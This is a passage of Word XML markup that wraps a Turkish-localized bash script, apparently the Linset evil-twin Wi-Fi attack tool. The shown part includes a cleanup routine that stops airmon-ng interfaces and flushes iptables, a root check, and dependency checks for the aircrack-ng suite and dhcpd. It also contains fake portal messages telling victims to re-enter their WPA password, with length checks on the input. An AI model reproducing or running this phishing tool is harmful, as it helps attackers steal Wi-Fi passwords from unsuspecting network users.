        <w:t>if [ "$WIFI2" != "" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4448C2EC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Arayüz öldürüldü "$yesil"$WIFI2"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366AB060" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>airmon-ng stop $WIFI2 &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FD2825" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF9E20A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C61883A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ "$(cat /proc/sys/net/ipv4/ip_forward)" != "0" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B3F6CE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Geri yükleniyor "$gri"ipforwarding"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17101F98" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "0" &gt; /proc/sys/net/ipv4/ip_forward #stop ipforwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6098CD21" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61024CB1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="30451D1C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Temizlendi "$gri"iptables"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667A89D8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables --flush</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06071909" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables --table nat --flush</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59582185" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables --delete-chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250ACE73" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables --table nat --delete-chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9ED12B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CB2BB9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Geri yükleniyor "$gri"tput"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72592E86" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>tput cnorm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625AAE1C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD64382" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ $LINSET_DEBUG != 1 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E8BC2C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C87DE0A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Çıkılıyor "$gri"dosyadan"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035E21CB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>rm -R $DUMP_PATH/* &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D431B79" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2281C9AD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6822A7B8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Yeniden başlatılıyor "$gri"NetworkManager"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14892EB0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>service restart networkmanager &amp;&gt; $linset_output_device &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD0DE8A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F654B7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$yesil"+"$beyaz"] "$yesil"Başarıyla temizlik yapıldı!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051C9845" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350A53DA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="683FADCA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB05E5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="521E0CBD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="65DB93E3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Web dilleri listesi oluşturun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C55484" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>readarray -t webinterfaceslenguage &lt; &lt;(echo -e "Engish [ENG] \e[1;31mAtras"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344818C1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEA84EC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5BFA1F49" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#TURKCE MESAJ KISMI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F0D49" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>DIALOG_WEB_INFO_ENG="Baglantiniza guvenli bir sekilde devam etmek icin &lt;b&gt;"$Host_ENC"&lt;/b&gt; WPA ag anahtarinizi tekrar etmelisiniz."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFD7438" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>DIALOG_WEB_INPUT_ENG="Lutfen WPA sifrenizi giriniz:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45608C38" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>DIALOG_WEB_SUBMIT_ENG="Giris"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F00E32" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>DIALOG_WEB_ERROR_ENG="&lt;b&gt;&lt;font color=\"red\" size=\"3\"&gt;Error&lt;/font&gt;:&lt;/b&gt; Girilen sifre dogru degil! &lt;b&gt;NOT&lt;/b&gt;:Hatirlamiyor iseniz klavuza bakiniz!&lt;/b&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D6370" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>DIALOG_WEB_OK_ENG="Baglantiniz birkac dakika icinde tekrar saglanacak."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BCA045" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>DIALOG_WEB_BACK_ENG="Geri Git"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575D5613" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>DIALOG_WEB_LENGHT_MIN_ENG="Sifreniz 7 karakterden az olamaz.Lutfen tekrar giriniz."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BBFD08" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>DIALOG_WEB_LENGHT_MAX_ENG="Sifreniz 64 karakterden fazla olamaz.Lutfen tekrar giriniz."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E6E57C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="64FEAE1F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="196AC0A4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2F6D2434" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>if ! [ $(id -u) = "0" ] 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0912A374" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mYou don't have admin privilegies"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B155456" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C512DBF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0154F5AC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="33616F92" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Tüm bağımlılıkların varlığını kontrol edin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0214B3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function checkdependences {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E0E225" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">echo "   "  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C506FC5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Aircrack-ng....."$mavi""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DCB999" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash aircrack-ng 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C9051E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D5FDE7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507A74FD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E6F83D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCDE5F9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FC4293" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C92AEF6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="124ED7A1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Aireplay-ng....."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B3012B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash aireplay-ng 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F40CBF9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DE0B51" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1864DFA5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E47FC6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0906D009" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65679B8B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C71F20" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C020397" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Airmon-ng......."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34508016" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash airmon-ng 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4EA9BB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D22753" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B846D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A542B4D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0E23C8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7F7E55" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751E5213" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="273FA2E2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>echo -ne "Airodump-ng....."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5874DE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash airodump-ng 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F884E68" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B349284" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE5CEA3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D350048" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0558A56C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CEDCDA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFB6F02" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDE9B70" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Awk............."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFDC6F8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash awk 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC6E32B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05E8FA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C77825" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F58D531" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF7AA05" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414246E7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A6D187" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C0F810" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Curl............"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF97DB7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash curl 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7758B1A4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A3CA74" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469A90F1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B74E5C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D45ECF9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA0E639" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DACE369" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9D10A8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Dhcpd..........."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2094CAE2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash dhcpd 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
